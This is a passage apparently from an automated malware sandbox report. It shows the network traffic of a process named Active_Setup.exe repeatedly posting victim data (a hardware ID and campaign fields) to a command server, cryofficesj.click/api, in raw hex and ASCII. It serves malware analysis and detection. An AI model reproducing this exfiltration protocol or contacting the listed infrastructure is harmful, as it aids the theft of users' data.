                                                                                                                                                2024-12-30 17:19:13 UTC1369INData Raw: 36 72 4c 49 56 35 4b 56 76 67 5a 59 4c 31 6d 44 68 62 37 53 50 70 79 43 4c 66 2f 57 4d 34 4f 32 58 67 36 4d 51 62 5a 70 6d 61 36 79 72 2f 30 66 35 34 7a 53 75 31 51 53 6f 59 59 67 31 6f 63 6e 6f 63 59 42 43 2f 4a 6a 71 2f 5a 48 66 79 42 39 6a 6b 6e 39 39 2b 71 58 78 41 62 62 37 50 4e 6e 56 53 50 6b 65 6e 69 58 72 30 75 56 69 34 68 47 67 69 61 50 79 77 49 53 76 58 54 7a 61 4b 48 37 36 73 2f 46 41 39 62 46 2b 6b 5a 5a 61 36 78 6e 34 53 35 65 4f 74 6a 53 79 55 62 43 34 35 76 2b 48 30 71 46 46 59 64 51 77 56 66 71 6a 38 54 69 34 34 33 54 58 7a 51 7a 64 58 63 68 37 76 70 2b 68 66 4a 74 47 39 4a 50 71 2b 38 4b 38 35 42 46 70 31 43 59 73 76 4b 76 70 56 37 6a 6a 61 49 62 56 46 4c 67 4d 6e 53 44 71 33 75 42 6a 71 67 2f 72 31 76 75 72 32 4d 43 68 52 58 7a 55 4d 43
                                                                                                                                                Data Ascii: 6rLIV5KVvgZYL1mDhb7SPpyCLf/WM4O2Xg6MQbZpma6yr/0f54zSu1QSoYYg1ocnocYBC/Jjq/ZHfyB9jkn99+qXxAbb7PNnVSPkeniXr0uVi4hGgiaPywISvXTzaKH76s/FA9bF+kZZa6xn4S5eOtjSyUbC45v+H0qFFYdQwVfqj8Ti443TXzQzdXch7vp+hfJtG9JPq+8K85BFp1CYsvKvpV7jjaIbVFLgMnSDq3uBjqg/r1vur2MChRXzUMC
                                                                                                                                                2024-12-30 17:19:13 UTC1369INData Raw: 46 72 62 74 4c 4a 6a 56 46 4e 45 65 6a 6a 57 47 78 2f 41 70 39 52 6d 79 6f 2b 37 6c 6a 70 58 35 46 43 4f 7a 5a 6d 75 37 2f 61 45 51 2b 65 78 43 6f 62 51 4d 70 68 37 41 4e 65 48 62 2f 6e 47 78 55 4c 4c 4f 76 62 6e 62 78 37 78 53 50 73 5a 33 49 71 4f 72 70 30 65 75 38 53 4c 58 68 77 79 77 48 6f 46 32 71 35 75 32 4d 71 4e 43 74 61 6a 54 7a 49 36 56 37 68 4e 2b 6d 57 52 4e 75 66 71 37 4f 63 69 32 62 35 6d 62 53 2f 35 50 68 6a 76 35 68 76 42 70 6a 41 47 36 31 74 4b 6c 77 49 71 76 58 53 36 68 61 32 4b 30 37 4b 63 57 75 34 52 69 6b 4a 52 61 2b 46 50 4b 56 4c 71 59 75 6e 48 37 41 66 54 57 74 62 6e 4f 30 75 73 55 4c 73 77 34 50 75 47 2b 34 6c 43 6d 38 58 50 5a 6a 41 7a 2b 48 70 34 6e 39 38 6d 69 63 65 30 42 74 5a 58 2f 2b 59 61 52 2b 51 59 70 71 6c 5a 4a 72 65 69
                                                                                                                                                Data Ascii: FrbtLJjVFNEejjWGx/Ap9Rmyo+7ljpX5FCOzZmu7/aEQ+exCobQMph7ANeHb/nGxULLOvbnbx7xSPsZ3IqOrp0eu8SLXhwywHoF2q5u2MqNCtajTzI6V7hN+mWRNufq7Oci2b5mbS/5Phjv5hvBpjAG61tKlwIqvXS6ha2K07KcWu4RikJRa+FPKVLqYunH7AfTWtbnO0usULsw4PuG+4lCm8XPZjAz+Hp4n98mice0BtZX/+YaR+QYpqlZJrei


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.449732188.114.97.34437532C:\Users\user\Desktop\Active_Setup.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:19:13 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=UPKT1BAEQ
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 18108
                                                                                                                                                Host: cryofficesj.click
                                                                                                                                                2024-12-30 17:19:13 UTC15331OUTData Raw: 2d 2d 55 50 4b 54 31 42 41 45 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 44 39 44 35 38 39 31 34 33 41 39 36 44 44 43 32 38 33 33 36 37 35 46 46 38 35 46 38 33 44 0d 0a 2d 2d 55 50 4b 54 31 42 41 45 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 50 4b 54 31 42 41 45 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 55 50 4b 54 31 42 41 45 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                Data Ascii: --UPKT1BAEQContent-Disposition: form-data; name="hwid"ADD9D589143A96DDC2833675FF85F83D--UPKT1BAEQContent-Disposition: form-data; name="pid"2--UPKT1BAEQContent-Disposition: form-data; name="lid"hRjzG3--ZINA--UPKT1BAEQContent-Dispo
                                                                                                                                                2024-12-30 17:19:13 UTC2777OUTData Raw: 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b
                                                                                                                                                Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{
                                                                                                                                                2024-12-30 17:19:14 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:19:14 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=0a795uiqbhb5cnj2ooj5ksbgf3; expires=Fri, 25 Apr 2025 11:05:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CmyURY7aPKMMaPehsMcr9KQ1kAmTIkAE32c%2FzC1mnQMgTrSnK4Rb1zsdSLkazubRiYEH9xVoVV04dZmAcR6EXnI6%2B%2BpM5SCwKnRi2yKXkmbXqZcpleo9SYmw4X5NTL%2BBVKsfmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3b190de6842fd-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2091&min_rtt=2084&rtt_var=796&sent=9&recv=22&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19062&delivery_rate=1362575&cwnd=248&unsent_bytes=0&cid=5c20abe2f7a2466f&ts=627&x=0"
                                                                                                                                                2024-12-30 17:19:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                2024-12-30 17:19:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.449733188.114.97.34437532C:\Users\user\Desktop\Active_Setup.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:19:15 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=7QUBYJNPHNLVMQ
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 8759
                                                                                                                                                Host: cryofficesj.click
                                                                                                                                                2024-12-30 17:19:15 UTC8759OUTData Raw: 2d 2d 37 51 55 42 59 4a 4e 50 48 4e 4c 56 4d 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 44 39 44 35 38 39 31 34 33 41 39 36 44 44 43 32 38 33 33 36 37 35 46 46 38 35 46 38 33 44 0d 0a 2d 2d 37 51 55 42 59 4a 4e 50 48 4e 4c 56 4d 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 51 55 42 59 4a 4e 50 48 4e 4c 56 4d 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 37 51 55 42 59 4a 4e 50 48
                                                                                                                                                Data Ascii: --7QUBYJNPHNLVMQContent-Disposition: form-data; name="hwid"ADD9D589143A96DDC2833675FF85F83D--7QUBYJNPHNLVMQContent-Disposition: form-data; name="pid"2--7QUBYJNPHNLVMQContent-Disposition: form-data; name="lid"hRjzG3--ZINA--7QUBYJNPH
                                                                                                                                                2024-12-30 17:19:15 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:19:15 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=rkh2hmiur9h9tvnn38q46musgk; expires=Fri, 25 Apr 2025 11:05:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xbGK0EEEZDijbORaCuhItoaimfu3hOg9W0kauUJpltrhOKVdoRc1JRlaH3YHsOT%2BaT2y8YfPJ4eOeGd1cRvqZXAIAoR88PXYguMKJK3LZFZrL155kqS6wLvq11juZy5Vz%2FcdKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3b1981b538c17-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1862&min_rtt=1819&rtt_var=769&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9695&delivery_rate=1346242&cwnd=240&unsent_bytes=0&cid=6f98aa77068b8e97&ts=467&x=0"
                                                                                                                                                2024-12-30 17:19:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                2024-12-30 17:19:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                4192.168.2.449734188.114.97.34437532C:\Users\user\Desktop\Active_Setup.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:19:16 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=VRN1V18XB5
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 20388
                                                                                                                                                Host: cryofficesj.click
                                                                                                                                                2024-12-30 17:19:16 UTC15331OUTData Raw: 2d 2d 56 52 4e 31 56 31 38 58 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 44 39 44 35 38 39 31 34 33 41 39 36 44 44 43 32 38 33 33 36 37 35 46 46 38 35 46 38 33 44 0d 0a 2d 2d 56 52 4e 31 56 31 38 58 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 56 52 4e 31 56 31 38 58 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 56 52 4e 31 56 31 38 58 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                Data Ascii: --VRN1V18XB5Content-Disposition: form-data; name="hwid"ADD9D589143A96DDC2833675FF85F83D--VRN1V18XB5Content-Disposition: form-data; name="pid"3--VRN1V18XB5Content-Disposition: form-data; name="lid"hRjzG3--ZINA--VRN1V18XB5Content-D
                                                                                                                                                2024-12-30 17:19:16 UTC5057OUTData Raw: 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78
                                                                                                                                                Data Ascii: lrQMn 64F6(X&7~`aO@dR<x
                                                                                                                                                2024-12-30 17:19:17 UTC1140INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:19:17 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=3lki69p078r19hb2r3e2kf7bl2; expires=Fri, 25 Apr 2025 11:05:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HzY13RTmTk5FBRdhJv1O1gVldN67kpICu8i%2FZt%2BxaSWWyeFlZ7kugnxuxNbLOvEstOYAGdSayaSR1SQy%2BfmG2Jl4n2jiTq9%2FwggyXWT5vu%2FWyLM62ZaDWO14fVJ%2BQNK7oauIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3b1a1389cc407-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1482&rtt_var=569&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21343&delivery_rate=1898569&cwnd=197&unsent_bytes=0&cid=9d28fc10cb2d8154&ts=1333&x=0"
                                                                                                                                                2024-12-30 17:19:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                2024-12-30 17:19:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                5192.168.2.449737188.114.97.34437532C:\Users\user\Desktop\Active_Setup.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:19:19 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=1TU6Q0GRH
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 5423
                                                                                                                                                Host: cryofficesj.click
                                                                                                                                                2024-12-30 17:19:19 UTC5423OUTData Raw: 2d 2d 31 54 55 36 51 30 47 52 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 44 39 44 35 38 39 31 34 33 41 39 36 44 44 43 32 38 33 33 36 37 35 46 46 38 35 46 38 33 44 0d 0a 2d 2d 31 54 55 36 51 30 47 52 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 54 55 36 51 30 47 52 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 31 54 55 36 51 30 47 52 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                Data Ascii: --1TU6Q0GRHContent-Disposition: form-data; name="hwid"ADD9D589143A96DDC2833675FF85F83D--1TU6Q0GRHContent-Disposition: form-data; name="pid"1--1TU6Q0GRHContent-Disposition: form-data; name="lid"hRjzG3--ZINA--1TU6Q0GRHContent-Dispo
                                                                                                                                                2024-12-30 17:19:20 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:19:20 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=heeusvnp8b72qr49k8cufnkp1u; expires=Fri, 25 Apr 2025 11:05:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=klx4G9BJjQoLwg6UlTyVPMmcOWJrKS%2FJpWEDw4bTRt6%2FpRjdmD%2Fewqz3luW3%2BsV%2B5zb2L0Z6Zio1yGxOEyXdhrikQLt0LOEEsQ7rMZVhkSLmppqaoYuW23YSH8f2Z3nRBMxd1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3b1b5ee5f43ef-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1592&rtt_var=603&sent=6&recv=12&lost=0&retrans=0&sent_bytes=2843&recv_bytes=6332&delivery_rate=1806930&cwnd=237&unsent_bytes=0&cid=488bfd5cf94660d4&ts=471&x=0"
                                                                                                                                                2024-12-30 17:19:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                2024-12-30 17:19:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                6192.168.2.449740188.114.97.34437532C:\Users\user\Desktop\Active_Setup.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:19:21 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=9GG5ZRYHRIWU2KO84LR
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 1262
                                                                                                                                                Host: cryofficesj.click
                                                                                                                                                2024-12-30 17:19:21 UTC1262OUTData Raw: 2d 2d 39 47 47 35 5a 52 59 48 52 49 57 55 32 4b 4f 38 34 4c 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 44 39 44 35 38 39 31 34 33 41 39 36 44 44 43 32 38 33 33 36 37 35 46 46 38 35 46 38 33 44 0d 0a 2d 2d 39 47 47 35 5a 52 59 48 52 49 57 55 32 4b 4f 38 34 4c 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 47 47 35 5a 52 59 48 52 49 57 55 32 4b 4f 38 34 4c 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49
                                                                                                                                                Data Ascii: --9GG5ZRYHRIWU2KO84LRContent-Disposition: form-data; name="hwid"ADD9D589143A96DDC2833675FF85F83D--9GG5ZRYHRIWU2KO84LRContent-Disposition: form-data; name="pid"1--9GG5ZRYHRIWU2KO84LRContent-Disposition: form-data; name="lid"hRjzG3--ZI
                                                                                                                                                2024-12-30 17:19:22 UTC1138INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:19:21 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=anb9k0rfnta3g3faer4aev8lvm; expires=Fri, 25 Apr 2025 11:06:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Bp%2FtJ3rHmUU9W%2FLa7DAgMGZ%2FdyBUsHGVZFT%2BXkDmbcJsYWC1IguzTP0m7R0EIKCLWmD31ZYG64vFm%2FOzk7h1wmhxlDpTvFA9w09Vx7UeM1CpFlGX89kT4h%2FMUF4sH%2FDBkXnbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3b1bc9ac3f795-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1523&min_rtt=1522&rtt_var=574&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2181&delivery_rate=1899804&cwnd=187&unsent_bytes=0&cid=62e4f20e44657cfd&ts=469&x=0"
                                                                                                                                                2024-12-30 17:19:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                2024-12-30 17:19:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                7192.168.2.449743188.114.97.34437532C:\Users\user\Desktop\Active_Setup.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:19:23 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=XTI3RS82PT
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 568927
                                                                                                                                                Host: cryofficesj.click
